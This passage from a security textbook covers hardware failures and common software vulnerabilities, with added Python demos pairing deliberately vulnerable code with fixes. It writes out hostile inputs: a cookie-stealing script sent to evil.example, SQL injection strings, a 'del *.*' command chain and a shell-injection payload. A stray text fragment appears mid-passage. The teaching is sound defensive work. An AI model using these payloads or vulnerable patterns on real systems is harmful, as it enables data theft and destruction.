Technical hardware failures or errors occur when a manufacturer distributes equipment containing a known or unknown flaw. These defects can cause the system to perform outside of expected parameters, resulting in unreliable service or lack of availability. Some errors are terminal, that is, they result in the unrecoverable loss of the equipment. Some errors are intermittent in that they only manifest themselves periodically, resulting in faults that are not easily repeated. Thus, equipment can sometimes stop working or work in unexpected ways. Murphy's law (yes, there really was a Murphy) holds that if something can possibly go wrong, it will.63 In other words, it's not a question of if something will fail, but when.

1) Company A attempts to establish an encrypted session with Company B.
2) Hacker intercepts the transmission and poses as Company B. Hacker exchanges his own keys with Company A. Hacker then establishes a session with Company B, posing as Company A.
3) Company B sends all messages to the hacker, who receives, decrypts, copies, and forwards copies (possibly modified) to Company A.
Figure 2-18 Man-in-the-middle attack
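The three steps of Figure 2-18 simulated in Python, as an added example that is not from the textbook: an unauthenticated Diffie-Hellman exchange lets the hacker finish holding a separate session key with each company, while the same exchange with each public value authenticated under a pre-shared key makes the substitution detectable. The toy group (a 127-bit Mersenne prime with generator 5), the pre-shared key, and the attacker's behavior are assumptions for the demonstration; real deployments use standardized groups of 2048 bits or more and certificates rather than a pre-shared secret.

```python
import hashlib
import hmac
import secrets

# Toy Diffie-Hellman parameters for illustration only (assumption: far too small for real use).
P = 2**127 - 1
G = 5


def dh_keypair():
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def dh_session_key(priv, peer_pub):
    """Shared secret g^(ab) mod p, hashed into a session key."""
    return hashlib.sha256(pow(peer_pub, priv, P).to_bytes(16, "big")).hexdigest()


def tag_for(pub, psk):
    """Authenticate a public value with a key only the legitimate parties share."""
    return hmac.new(psk, pub.to_bytes(16, "big"), hashlib.sha256).digest()


def key_exchange(intercept, psk):
    """Run A<->B agreement through a hacker who may replace the public values in flight.
    psk=None means an unauthenticated exchange. Returns (a_key, b_key, hacker_keys); a side
    that detects tampering aborts and reports None."""
    a_priv, a_pub = dh_keypair()
    b_priv, b_pub = dh_keypair()
    m_priv, m_pub = dh_keypair()          # the hacker's own key pair

    # Step 1: A sends its public value toward B.
    a_msg = (a_pub, tag_for(a_pub, psk) if psk else None)
    if intercept:                          # Step 2: hacker swaps in his value; he cannot recompute the tag
        a_msg = (m_pub, a_msg[1])
    b_msg = (b_pub, tag_for(b_pub, psk) if psk else None)
    if intercept:
        b_msg = (m_pub, b_msg[1])

    def accept(msg):
        pub, tag = msg
        return psk is None or hmac.compare_digest(tag, tag_for(pub, psk))

    a_key = dh_session_key(a_priv, b_msg[0]) if accept(b_msg) else None
    b_key = dh_session_key(b_priv, a_msg[0]) if accept(a_msg) else None
    # Step 3: with both sessions in hand the hacker decrypts, copies, and re-encrypts.
    hacker = (dh_session_key(m_priv, a_pub), dh_session_key(m_priv, b_pub)) if intercept else None
    return a_key, b_key, hacker


if __name__ == "__main__":
    a, b, m = key_exchange(intercept=True, psk=None)
    print("unauthenticated, intercepted: A and B agree?", a == b, "| hacker holds both keys?", m == (a, b))
    a, b, m = key_exchange(intercept=True, psk=b"shared secret")
    print("authenticated, intercepted: sessions aborted?", a is None and b is None)
```

The unauthenticated run shows the essential property of the figure: A and B each believe they have an encrypted session, yet neither key is known to the other party, and both are known to the hacker. The authenticated run shows why the fix is authentication of the exchange, not stronger encryption afterwards.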



The Intel Pentium CPU Failure
One of the best-known hardware failures is that of the original Intel Pentium chip (similar to the one shown in Figure 2-19), which had a defect that resulted in a calculation error under certain circumstances. Intel initially expressed little concern for the defect and stated that it would take an inordinate amount of time to identify a calculation that would interfere with the reliability of results. Yet, within days after the chip's defect was announced, popular computing journals were publishing a simple calculation (the division of 4,195,835 by 3,145,727 within a spreadsheet) that determined whether a machine contained the defective chip and thus the floating-point operation bug: a correct processor returns 1.333820..., whereas the flawed one returns 1.333739.... The Pentium floating-point division bug (FDIV) led to a public-relations disaster for Intel that resulted in its first-ever chip recall and a loss of more than $475 million. Later, disclosure of another bug, known as the Dan-0411 flag erratum, further eroded the chip manufacturer's public image.64 In 1998, Intel released its Xeon chip and discovered it also had hardware errors. Intel said, "All new chips have bugs, and the process of debugging and improving performance inevitably continues even after a product is in the market."65
Figure 2-19 Intel chip

Mean Time Between Failure
In hardware terms, failures are measured in mean time between failure (MTBF) and mean time to failure (MTTF). While MTBF and MTTF are sometimes used interchangeably, MTBF presumes that the item can be repaired or returned to service, whereas MTTF presumes the item must be replaced. From a repair standpoint, MTBF = MTTF + MTTD + MTTR, where MTTD is the mean time to diagnose and MTTR the mean time to repair. The most commonly failing piece of computer hardware is the hard drive, which currently has an average quoted MTBF of approximately 500,000 hours. Hard drive vendors report they are converting from MTBF for hard drives to a new measure, annualized failure rate (AFR), which is based on the manufacturer's product and warranty data. So, instead of a 500,000-hour MTBF, you could see an AFR of 0.5 percent. The two figures are related but not equivalent: for a constant failure rate, AFR is approximately the 8,760 hours in a year divided by the MTBF, so a 500,000-hour MTBF corresponds to roughly 1.75 percent per year, and AFRs observed in the field are often higher than the rates implied by vendor MTBF claims.

mean time between failure (MTBF): The average amount of time between hardware failures, calculated as the total amount of operation time for a specified number of units divided by the total number of failures.
mean time to failure (MTTF): The average amount of time until the next hardware failure.
mean time to diagnose (MTTD): The average amount of time a computer repair technician needs to determine the cause of a failure.
mean time to repair (MTTR): The average amount of time a computer repair technician needs to resolve the cause of a failure through replacement or repair of a faulty unit.
annualized failure rate (AFR): The probability of a failure of hardware based on the manufacturer's data of failures per year.

Technical Software Failures or Errors
Large quantities of computer code are written, debugged, published, and sold before all their bugs are detected and resolved. Sometimes, combinations of certain software and hardware reveal new failures that range from bugs to untested failure conditions. Sometimes these bugs are not errors but purposeful shortcuts left by programmers for benign or malign reasons. Collectively, shortcut access routes into programs that bypass security checks are called trap doors, and they can cause serious security breaches.
Software bugs are so commonplace that entire Web sites are dedicated to documenting them. Among the best known is Bugtraq, found at www.securityfocus.com, which provides information on the latest security vulnerabilities as well as a thorough archive of past bugs.

The OWASP Top 10
The Open Web Application Security Project (OWASP) was founded in 2001 as a nonprofit consortium dedicated to helping organizations create and operate software applications they could trust. Every three years or so, OWASP publishes a list of "Top 10 Web Application Security Risks" along with an OWASP Developer's Guide. The 2017 edition of the OWASP Top 10 consists of the following:
1. Injection
2. Broken authentication
3. Sensitive data exposure
4. XML external entities (XXE)
5. Broken access control
6. Security misconfiguration
7. Cross-site scripting (XSS)
8. Insecure deserialization
9. Using components with known vulnerabilities
10. Insufficient logging and monitoring66

Most of these categories have persisted, under one name or another, since the 2010 edition; insecure direct object references, listed separately in earlier editions, was folded into broken access control in 2017, and the 2021 edition reorganized the list again and moved broken access control to the top. Many of these items are described in detail in the following section.

For more information on the top 10 software vulnerabilities or the OWASP project, visit www.owasp.org.

The Deadly Sins in Software Security
Some software development failures and errors result in software that is difficult or impossible to deploy in a secure fashion. The most common of these failures have been identified as "deadly sins in software security."67 These problem areas in software development were originally categorized by John Viega, upon request of Amit Yoran, who at the time was the director of the Department of Homeland Security's National Cyber Security Division. These problem areas are described in the following sections. The first four "sins" are focused on Web applications.

SQL Injection SQL injection occurs when developers fail to properly validate user input before using it to query a relational database. For example, a fairly innocuous program fragment might expect the user to input a user ID and then perform a SQL query against the USERS table to retrieve the associated name:
Accept USER-ID from console;
SELECT USERID, NAME FROM USERS WHERE USERID = USER-ID;
This is very straightforward SQL syntax; when used correctly, it displays the user ID and name. The problem is that the string accepted from the user is passed directly to the SQL database server as part of the SQL command. What if an attacker enters the string "JOE OR 1 = 1"? This string includes some valid SQL syntax that will return all rows from the table where the user ID is either "JOE" or "1 = 1." Because one is always equal to one, the system returns all user IDs and names. (In a real query the value is enclosed in quotation marks, so the attacker first closes the quotation with something like JOE' OR '1'='1; the principle is the same.) The possible effects of the hacker's "injection" of SQL code into the program are not limited to improper access to information: what if the attacker included SQL commands to drop the USERS table or even shut down the database? The standard fix is to keep data and code separate by using parameterized queries (prepared statements), in which the user's value is bound to a placeholder and is never parsed as SQL.
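The query above made concrete with Python's built-in sqlite3 module, as an added example that is not from the textbook: the same lookup written by string concatenation and as a parameterized query, run against a constructed USERS table with a payload that closes the quotation mark. The table rows are constructed for the demonstration.

```python
import sqlite3


def make_users_db():
    """In-memory USERS table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (USERID TEXT PRIMARY KEY, NAME TEXT)")
    conn.executemany("INSERT INTO USERS VALUES (?, ?)",
                     [("JOE", "Joe Jackson"), ("AMY", "Amy Chen"), ("ADMIN", "Administrator")])
    return conn


def lookup_vulnerable(conn, user_id):
    """Deliberately vulnerable: the user's string is spliced into the SQL text."""
    sql = "SELECT USERID, NAME FROM USERS WHERE USERID = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Parameterized query: the value travels separately from the statement and can never become SQL."""
    return conn.execute("SELECT USERID, NAME FROM USERS WHERE USERID = ?", (user_id,)).fetchall()


def demo():
    conn = make_users_db()
    # Closes the quoted literal, adds an always-true clause, and reuses the program's trailing quote:
    #   ... WHERE USERID = 'JOE' OR '1'='1'
    payload = "JOE' OR '1'='1"
    return {
        "honest_vulnerable": lookup_vulnerable(conn, "JOE"),
        "payload_vulnerable": lookup_vulnerable(conn, payload),
        "payload_safe": lookup_safe(conn, payload),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

With the payload, the vulnerable lookup returns every row while the parameterized one returns nothing, because it searched for a user literally named JOE' OR '1'='1. One caveat on the book's DROP TABLE variant: sqlite3's execute() refuses to run two statements in one call, so that payload raises an error here, but other drivers and databases do allow stacked statements, and this refusal is a quirk of one driver, not a defense.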

Web Server-Related Vulnerabilities (XSS, XSRF, and Response Splitting) One of the issues in programming Web-based applications is bugs that affect either the client side or the server side. Server-side cross-site scripting occurs when a server embeds untrusted data in the pages it generates without encoding it, so that a script supplied by one visitor runs in the browsers of the clients that later connect to the site. Cross-site scripting allows the attacker to acquire valuable information, such as account credentials, session cookies, account numbers, or other critical data. Often an attacker encodes a malicious link and places it on the target server, making it look less suspicious. After the hostile script collects the data, it sends it to the attacker while the page continues to look like a valid response from the intended server. Cross-site request forgery (XSRF or CSRF) attacks cause users' browsers to send requests to servers the users are legitimately logged in to, on behalf of an outside attacker; for example, on a banking Web site, this could include changing a fund transfer account number to the attacker's account number. HTTP response splitting occurs when unvalidated input, such as a value taken from the HTTP request, is copied into an HTTP response header; carriage-return and line-feed characters in that input end the header early and let the attacker append headers, or an entire second response, of his own choosing.
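The two server-side faults above beside their fixes, as an added example that is not from the textbook: a comment rendered raw versus HTML-escaped (XSS), and a funds-transfer handler that accepts any request carrying the session versus one that demands a token bound to the session (CSRF). The comment payload, the session identifier, the form fields, and the HMAC-based token scheme are assumptions constructed for the demonstration.

```python
import hashlib
import hmac
import html
import secrets
from urllib.parse import quote

# Constructed payload of the kind the text describes: if echoed raw, it ships each reader's
# cookies to a host the attacker controls.
COMMENT = '<script>new Image().src="https://evil.example/c?"+document.cookie</script>'
SERVER_SECRET = secrets.token_bytes(32)   # assumed per-deployment key, never sent to clients


def render_comment_vulnerable(comment: str) -> str:
    return "<p>" + comment + "</p>"                             # the script runs in every reader's browser


def render_comment_safe(comment: str) -> str:
    return "<p>" + html.escape(comment, quote=True) + "</p>"    # the browser shows text, runs nothing


def render_search_link_safe(term: str) -> str:
    """Two contexts stacked: URL-encode for the query string, then HTML-escape for the attribute."""
    return ('<a href="/search?q=' + html.escape(quote(term, safe=""), quote=True) + '">'
            + html.escape(term) + "</a>")


def csrf_token(session_id: str) -> str:
    """Token bound to the session; a hostile page cannot compute it without SERVER_SECRET."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(session_id: str, form: dict) -> str:
    """State-changing request: refuse unless the form carries the token issued to this session."""
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(session_id)):
        return "rejected: missing or invalid CSRF token"
    return f"transferred {form['amount']} to {form['to_account']}"


def demo():
    session = "sess-7f3a"                                                # constructed session id
    forged = {"amount": "5000", "to_account": "ATTACKER-ACCT"}          # auto-submitted from a hostile page
    genuine = dict(forged, csrf_token=csrf_token(session))              # rendered into the bank's own form
    return {
        "raw_has_script": "<script>" in render_comment_vulnerable(COMMENT),
        "escaped_has_script": "<script>" in render_comment_safe(COMMENT),
        "forged": handle_transfer(session, forged),
        "genuine": handle_transfer(session, genuine),
    }


if __name__ == "__main__":
    print(demo())
```

The browser attaches the session cookie to the forged request just as it does to the genuine one, which is why the cookie alone cannot distinguish them; the token can, because the attacker's page never sees it. Marking the session cookie SameSite adds a second, browser-enforced layer.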

Web Client-Related Vulnerability (XSS) The same cross-site scripting attacks that can infect a server can also be used to attack Web clients. Client-side cross-site scripting errors can cause problems that allow an attacker to send malicious code to the user's computer by inserting the script into an otherwise normal Web site. The user's Web browser, not knowing the code is malicious, runs it and inadvertently infects the client system. Some code can read a user's Web information, such as his or her Web history, stored cookies or session tokens, or even stored passwords.

cross-site scripting (XSS): A Web application fault that occurs when an application running on a Web server inserts commands into a user's browser session and causes information to be sent to a hostile server.

Use of Magic URLs and Hidden Forms HTTP is a stateless protocol: each request is handled on its own, and the programs on either end of the communication channel cannot rely on the server remembering anything from one request to the next. This makes it difficult for software developers to track a user's exchanges with a Web site over multiple interactions. Too often, sensitive state information is included in hidden form fields on the HTML page or simply included in a "magic" URL. (For example, the authentication ID is passed as a parameter in the URL for the exchanges that will follow.) If this information is stored as plain text, an attacker can harvest the information from a magic URL as it travels across the network (or later, from browser history, bookmarks, and the Referer header sent to other sites) or use scripts on the client to modify information in hidden form fields. Depending on the structure of the application, the harvested or modified information can be used in spoofing or hijacking attacks, or to change the way the application operates. For example, if an item's price is kept in a hidden form field, the attacker could arrange to buy that item for one cent.

buffer overrun: An application error that occurs when more data is sent to a program buffer than it is designed to handle.
integer bug: A class of computational error caused by methods that computers use to store and manipulate integer numbers; this bug can be exploited by attackers.
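The one-cent purchase above and the two ways to prevent it, as an added example that is not from the textbook: a checkout that trusts a price carried in a hidden field, versus one that keeps the price on the server and lets only a signed, tamper-evident reference round-trip through the browser. The catalog, the server key, and the form fields are assumptions constructed for the demonstration.

```python
import hashlib
import hmac
import json

SERVER_KEY = b"assumed-server-side-key-change-me"   # assumption: held only on the server
CATALOG = {"SKU-100": 19.99, "SKU-200": 249.00}      # constructed price list


def sign_state(fields: dict) -> str:
    """Serialize round-trip state and append an HMAC so any client-side edit is detectable."""
    payload = json.dumps(fields, sort_keys=True, separators=(",", ":"))
    tag = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + tag


def verify_state(value: str):
    """Return the fields if the tag matches, otherwise None."""
    payload, sep, tag = value.rpartition(".")      # the hex tag never contains a dot
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(payload)


def checkout_vulnerable(form: dict) -> float:
    """Trusts the price the browser sent back in a hidden field."""
    return round(float(form["price"]) * int(form["qty"]), 2)


def checkout_safe(form: dict):
    """The hidden field carries only a signed reference; the price comes from the server-side catalog."""
    state = verify_state(form["state"])
    if state is None or state["sku"] not in CATALOG:
        return None
    return round(CATALOG[state["sku"]] * int(form["qty"]), 2)


def demo():
    page_state = sign_state({"sku": "SKU-100"})                # what the server put in the page
    honest = {"price": "19.99", "qty": "2", "state": page_state}
    tampered = {"price": "0.01", "qty": "2",                   # attacker edited both hidden fields
                "state": page_state.replace("SKU-100", "SKU-FREE")}
    return {
        "vuln_honest": checkout_vulnerable(honest),
        "vuln_tampered": checkout_vulnerable(tampered),
        "safe_honest": checkout_safe(honest),
        "safe_tampered": checkout_safe(tampered),
    }


if __name__ == "__main__":
    print(demo())
```

Signing hidden state detects modification but does not hide it, so anything secret still must not be placed in the form at all; and signing is never a substitute for re-deriving values such as prices from the server's own records.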
caused by methods that computers
Buffer Overrun The next set of "sins" is focused on implementation. For example, buffers are used to manage mismatches in the processing rates between two entities involved in a communication process. During a buffer overrun, data written past the end of the buffer overwrites whatever lies next to it in memory: adjacent variables, a saved return address, or a function pointer. By choosing that data, an attacker can make the target system execute instructions of the attacker's choosing or take advantage of some other unintended consequence of the failure. Sometimes this is limited to a DoS attack. In any case, data on the attacked system loses integrity. Modern compilers and operating systems add mitigations such as stack canaries, non-executable memory, and address space layout randomization, which make exploitation harder but do not remove the underlying bug. In 1998, Microsoft encountered the following buffer overflow problem:

Microsoft acknowledged that if you type a res://URL (a Microsoft-devised type of URL) which is longer
than 256 characters in Internet Explorer 4.0, the browser will crash. No big deal, except that anything
after the 256th character can be executed on the computer. This maneuver, known as a buffer overrun,
is just about the oldest hacker trick in the book. Tack some malicious code (say, an executable version
of the Pentium-crashing FooF code) onto the end of the URL, and you have the makings of a disaster.68

One of the marks of effective software is the ability to catch and resolve exceptions, unusual situations that require special processing. If the program doesn't manage exceptions correctly, the software may not perform as expected. Exceptions differ from errors in that exceptions are considered expected but irregular situations at runtime, while errors are mistakes in the running program that can be resolved only by fixing the program.

Format String Problems Computer languages often are equipped with built-in capabilities to reformat data while they output it. The formatting instructions are usually written as a "format string." Unfortunately, some programmers may use data from untrusted sources as a format string. An attacker may embed characters that are meaningful as formatting directives (such as %x, %d, %p, etc.) into malicious input. If this input is then interpreted by the program as formatting directives (such as the first argument to the C printf function), the attacker may be able to read memory that was never meant to be displayed (for example, the contents of the stack) or, using the %n directive, which writes a count back through a pointer, overwrite very targeted portions of the program's stack with data of the attacker's choosing.
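The same mistake in a memory-safe language, as an added example that is not from the textbook: Python's str.format obeys directives in whatever string it is called on, so an untrusted template can walk attributes of its arguments and, through a method's __globals__, reach module-level values. The Account class, its secrets, and the module constant are constructed for the demonstration. Python has no equivalent of C's %n, so the damage here is disclosure rather than a memory write.

```python
DB_PASSWORD = "hunter2-constructed"    # constructed module-level secret, stands in for real configuration


class Account:
    def __init__(self, name, api_key):
        self.name = name
        self.api_key = api_key        # constructed per-user secret


def greet_vulnerable(template_from_user: str, account: Account) -> str:
    """The untrusted string is used as the format string, so its directives are obeyed."""
    return template_from_user.format(account)


def greet_safe(template_from_user: str, account: Account) -> str:
    """Fixed format string written by the developer; user text is only ever an argument."""
    return "Hello {name}, you said: {msg}".format(name=account.name, msg=template_from_user)


def demo():
    acct = Account("joe", "ak-9f2c-constructed")
    leak_attr = "{0.api_key}"                                   # reads an attribute of the argument
    leak_global = "{0.__init__.__globals__[DB_PASSWORD]}"       # method -> function globals -> module constant
    return {
        "attr_vulnerable": greet_vulnerable(leak_attr, acct),
        "global_vulnerable": greet_vulnerable(leak_global, acct),
        "attr_safe": greet_safe(leak_attr, acct),
    }


if __name__ == "__main__":
    print(demo())
```

The rule is the same in C and Python: the format string is code and must come from the program, never from the input; the input is data and goes in the argument list.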

Integer Bugs (Overflows/Underflows) Although mathematical calculation theoretically can deal with numbers that
contain an arbitrary number of digits, the binary representations used by computers are of a particular fixed length.
The programmer must anticipate the size of the numbers to be calculated in any given part of the program. An integer
bug can result when a programmer does not validate the inputs to a calculation to verify that the integers are of the
expected size. For example, adding 1 to 32,767 should produce 32,768, but in computer arithmetic with 16-bit signed
integers, the erroneous result is –32,768. An underflow can occur, for example, when you subtract 5 from negative
32,767, which returns the incorrect result +32,764, because the largest negative integer that can be represented in 16
bits is negative 32,768.

Integer bugs fall into four broad classes: overflows, underflows, truncations, and signedness errors.
Integer bugs are usually exploited indirectly—that is, triggering an integer bug enables an attacker to
corrupt other areas of memory, gaining control of an application. The memory allocated for a value
could be exceeded, if that value is greater than expected, with the extra bits written into other locations.
The system may then experience unexpected consequences, which could be miscalculations, errors,
crashing, or other problems. Even though integer bugs are often used to build a buffer overflow or
other memory corruption attack, integer bugs are not just a special case of memory corruption bugs.69
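The arithmetic of the integer bug section and the way it turns into the buffer overrun described earlier, as one added example (not from the textbook) serving both passages: a helper that reduces Python's unbounded integers to what a fixed-width register would hold reproduces the 16-bit examples above, and a size computation in a 32-bit unsigned type shows how a wrapped product slips past a bounds check so that the copy that follows runs far beyond the buffer. The record counts, element size, and buffer size are assumptions chosen for the demonstration.

```python
def wrap_signed(value: int, bits: int) -> int:
    """Reduce an unbounded int to what a `bits`-wide two's-complement register would hold."""
    mask = (1 << bits) - 1
    value &= mask
    return value - (1 << bits) if value & (1 << (bits - 1)) else value


def wrap_unsigned(value: int, bits: int) -> int:
    return value & ((1 << bits) - 1)


def add_checked(a: int, b: int, bits: int):
    """Return (wrapped_result, overflowed) for a signed add of the given width."""
    r = wrap_signed(a + b, bits)
    return r, r != a + b


def copy_records_vulnerable(count: int, elem_size: int, buffer_bytes: int) -> str:
    """C-style size computation in a 32-bit size_t: the product wraps, the bounds check passes,
    and a copy loop would then run `count` iterations past the end of a tiny buffer."""
    needed = wrap_unsigned(count * elem_size, 32)
    if needed > buffer_bytes:
        return "rejected"
    return f"allocated {needed} bytes, copying {count} records"


def copy_records_safe(count: int, elem_size: int, buffer_bytes: int) -> str:
    """Check the multiplication itself before trusting its result."""
    if elem_size <= 0 or count < 0 or count > (2**32 - 1) // elem_size:
        return "rejected: size overflow"
    needed = count * elem_size
    if needed > buffer_bytes:
        return "rejected"
    return f"allocated {needed} bytes, copying {count} records"


def demo():
    return {
        "int16_overflow": wrap_signed(32767 + 1, 16),        # the text's 32,767 + 1 example
        "int16_underflow": wrap_signed(-32767 - 5, 16),      # the text's -32,767 - 5 example
        "checked": add_checked(32767, 1, 16),
        "vuln": copy_records_vulnerable(0x40000001, 4, 4096),   # 0x40000001 * 4 wraps to 4
        "safe": copy_records_safe(0x40000001, 4, 4096),
    }


if __name__ == "__main__":
    print(demo())
```

In C the overflow check belongs before the multiplication, as copy_records_safe does, because once the product has wrapped there is nothing left in the result to detect; compilers also offer checked-arithmetic builtins that report the overflow directly.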

C++ Catastrophes C++ is a programming language that has been around since the 1980s. In recent years, issues have arisen that cause concern from a security perspective. The first of these issues is the compromise of a function pointer, which is a way to reference executable code in memory. Many operating systems have APIs that use these pointers to control the execution of code. If these pointers are corrupted, the flow of the program can be interrupted and redirected. The second issue arises because every object of a C++ class with virtual methods carries a pointer to the class's virtual function table, the table the program consults to decide which implementation to call. Overwriting the object, for example through a buffer overrun or by using the object after it has been freed, lets the attacker replace the virtual table pointer with one that points to a table he controls, which again allows the attacker to take over the flow of the program.70
Catching Exceptions Exceptions are unusual conditions that interrupt the normal flow of a program. How the program handles these conditions can allow the program either to close safely or to continue in an unstable and potentially insecure manner. Attackers learn about programs that don't handle errors well and figure out how to intentionally introduce an error, allowing them to seize control of the application in its post-error state. Learning how to properly manage "try-catch" blocks to handle exceptions is a critical skill in programming, and even the best programmers run across unexpected conditions that result in system problems. This "sin" is closely related to several others that deal with system or program errors.

Command Injection The problem of command injection is caused by a developer's failure to ensure that command input is validated before it is used in the program. Perhaps the simplest example can be demonstrated using the Windows command shell:
@echo off
rem Read a string from the user, copy it into a second variable, and display it.
set /p myVar="Enter the string>"
set someVar=%myVar%
echo %someVar%

These commands ask the user to provide a string and then simply set another variable to the value and display it. However, the value of %myVar% is substituted into the line before the shell parses it, so an attacker can use the command chaining character "&" to append other commands to the string the user provides (for example, Hello&del *.*): the expanded line "set someVar=Hello&del *.*" sets the variable and then deletes every file in the current directory.
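The same flaw and its fix in Python, as an added example that is not from the textbook: one version hands a string to the shell, so separators in the input become extra commands, and the other passes the input as a single argument with no shell involved, alongside an allowlist check for the cases where a shell cannot be avoided. The stand-in tool (the Python interpreter printing its first argument) and the payload are assumptions; the demonstration assumes a POSIX sh, where ";" separates commands, in place of cmd.exe's "&".

```python
import re
import shlex
import subprocess
import sys

# Portable stand-in for an external tool that prints its first argument.
PRINT_ARG = [sys.executable, "-c", "import sys; print(sys.argv[1])"]


def run_vulnerable(user_input: str) -> str:
    """Builds one command string for the shell, so metacharacters in the input are obeyed."""
    cmd = shlex.join(PRINT_ARG) + " " + user_input
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_safe(user_input: str) -> str:
    """No shell: the input is exactly one argv element and cannot become a second command."""
    return subprocess.run(PRINT_ARG + [user_input], capture_output=True, text=True).stdout


SAFE_TOKEN = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def is_allowed_token(user_input: str) -> bool:
    """Allowlist check for the cases where a shell really is required: accept only what is needed."""
    return SAFE_TOKEN.match(user_input) is not None


def demo():
    payload = "Hello; echo INJECTED"      # constructed attacker input
    return {"vulnerable": run_vulnerable(payload), "safe": run_safe(payload)}


if __name__ == "__main__":
    print(demo())
```

Escaping the input for the shell (shlex.quote) is a weaker third option: it works only if every call site remembers it and only for the shell it was written for, whereas the argv form removes the parser from the path entirely.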

Failure to Handle Errors What happens when a system or application encounters a scenario that it is not prepared to handle? Does it attempt to complete the operation (reading or writing data or performing calculations)? Does it issue a cryptic message that only a programmer could understand, or does it simply stop functioning? Failure to handle errors can cause a variety of unexpected system behaviors. Programmers are expected to anticipate problems and prepare their application code to handle them. This category focuses on those errors rather than exceptions, which were described earlier.

Information Leakage One of the most common methods of obtaining inside and classified information is directly or indirectly from one person, usually an employee. A famous World War II military poster warned that "loose lips sink ships," emphasizing the risk to naval deployments from enemy attack if sailors, Marines, or their families disclosed the movements of U.S. vessels. A widely shared fear was that the enemy had civilian operatives waiting in bars and shops at common Navy ports of call, just waiting for the troops to drop hints about where they were going and when. By warning employees against disclosing information, organizations can protect the secrecy of their operation. Software leaks in the same way: detailed error messages, stack traces, version banners, and comments left in pages served to users all tell an attacker what is running and where to look next, so applications should log the details for administrators and show users only a generic message.

Race Conditions A race condition is a failure of a program that occurs when an unexpected ordering of events in its execution results in a conflict over access to a system resource. This conflict does not need to involve separate threads of code inside the program, because current operating systems and processor technology run many programs at once and break a single program into multiple threads that can execute simultaneously. If the threads that result from this process share any resources, they may interfere with each other. A race condition occurs, for example, when a program checks a temporary file and then uses it, and an attacker can replace it between the time it is checked and the time it is used (a time-of-check to time-of-use, or TOCTOU, flaw). A race condition can also occur when information is stored in memory shared by multiple threads and one thread stores information in the wrong memory location, either by accident or intent.
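The temporary-file race above reproduced in Python, as an added example that is not from the textbook: the vulnerable writer checks whether a path exists and then opens it, and the attacker's move in between (planting a symbolic link at that path) redirects the write onto a file the program never meant to touch; the safe writer makes creation a single atomic step with O_CREAT|O_EXCL, which the kernel refuses when anything, link included, already sits at the path. The directory layout, the victim file, and the attacker's timing are constructed for the demonstration, which assumes a POSIX system where symbolic links can be created without special privilege.

```python
import os
import tempfile


def write_report_vulnerable(path, data, between_check_and_use=lambda: None):
    """Check-then-use: the file may change identity between the two steps."""
    if os.path.exists(path):                       # time of check
        return "refused: exists"
    between_check_and_use()                        # the race window (simulated here; real attackers loop)
    with open(path, "w") as f:                     # time of use: follows whatever `path` is now
        f.write(data)
    return "written"


def write_report_safe(path, data, between_check_and_use=lambda: None):
    """One atomic step: create the file only if nothing (file or symlink) is at `path`."""
    between_check_and_use()
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        return "refused: exists"
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return "written"


def simulate(use_safe: bool):
    """Constructed scenario: an attacker plants a symlink in the race window so the program's
    write lands on a file it never intended to touch. Returns (result, victim file contents)."""
    workdir = tempfile.mkdtemp()
    victim = os.path.join(workdir, "victim.txt")
    with open(victim, "w") as f:
        f.write("original")
    target = os.path.join(workdir, "report.tmp")

    def attacker_moves():
        os.symlink(victim, target)

    writer = write_report_safe if use_safe else write_report_vulnerable
    result = writer(target, "attacker-controlled", attacker_moves)
    with open(victim) as f:
        return result, f.read()


if __name__ == "__main__":
    print("vulnerable:", simulate(False))
    print("safe:      ", simulate(True))
```

The general rule is that a check on a name proves nothing about the object the name will refer to a moment later; act on the object itself (open it atomically, then fstat and write through the descriptor you hold) rather than on its name, and for temporary files let tempfile.mkstemp or NamedTemporaryFile do that for you.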

Poor Usability Employees prefer doing things the easy way. When faced with an "official way" of performing a task and an "unofficial way" that is easier, they prefer the latter. The best solution to address this issue is to provide only one way: the secure way! Integrating security and usability, adding training and awareness, and ensuring solid controls all contribute to the security of information. Allowing users to choose easier solutions by default will inevitably lead to loss.

Not Updating Easily As developers create applications, they try to catch all of the errors and bugs in the programs. With the extreme complexity of modern applications, and with the expected dramatic increase in complexity of future applications, it's not always possible to catch all of the errors before the product needs to go to market. The current method of handling this issue is to release patches and updates after the product is in the hands of the consumers. Updates themselves introduce a security risk, as attackers could intercept and swap out legitimate updates or patches with malware or their own program alterations unless the update channel is protected, typically by delivering updates over an authenticated connection and verifying a digital signature on each update before it is installed. Applications that don't update cleanly and securely thus introduce a security risk for the organization. The aspects of change management discussed in later modules in this book also affect this sin, as the ability to test and roll back changes is critical in case an update or patch results in unexpected issues.

command injection: An application error that occurs when user input is passed directly to a compiler or interpreter without screening for content that may disrupt or compromise the intended function.

Executing Code with Too Much Privilege Computers talk to other computers and are users in their own right. As users, they must have privileges to access programs and data on other computers. When systems are set up with excessive privileges, they can create security issues. Just like users, systems and applications should only have the least privilege they need to do the job. Developers may initially assign higher-level privileges in the development of an application and then forget to lower those privileges. If attackers can compromise a system with these high-level privileges, they can use that access to take over other systems. One of the greatest concerns in this area occurs when individuals download and run code from public sources, like Web sites. Because you didn't develop the code or pay a professional vendor for it, you can't be certain that the code doesn't contain malicious components like back doors or data exfiltration components.

Failure to Protect Stored Data Protecting stored data is a large enough issue to be the core subject of this entire
text. Programmers are responsible for integrating access controls into programs and keeping secret information out
of them. Access controls, the subject of later modules, regulate who, what, when, where, and how users and systems
interact with data. Failure to properly implement sufficiently strong access controls makes the data vulnerable. Overly
strict access controls hinder business users in the performance of their duties, and as a result, the controls may be
administratively removed or bypassed. The integration of secret information—such as the “hard coding” of passwords,
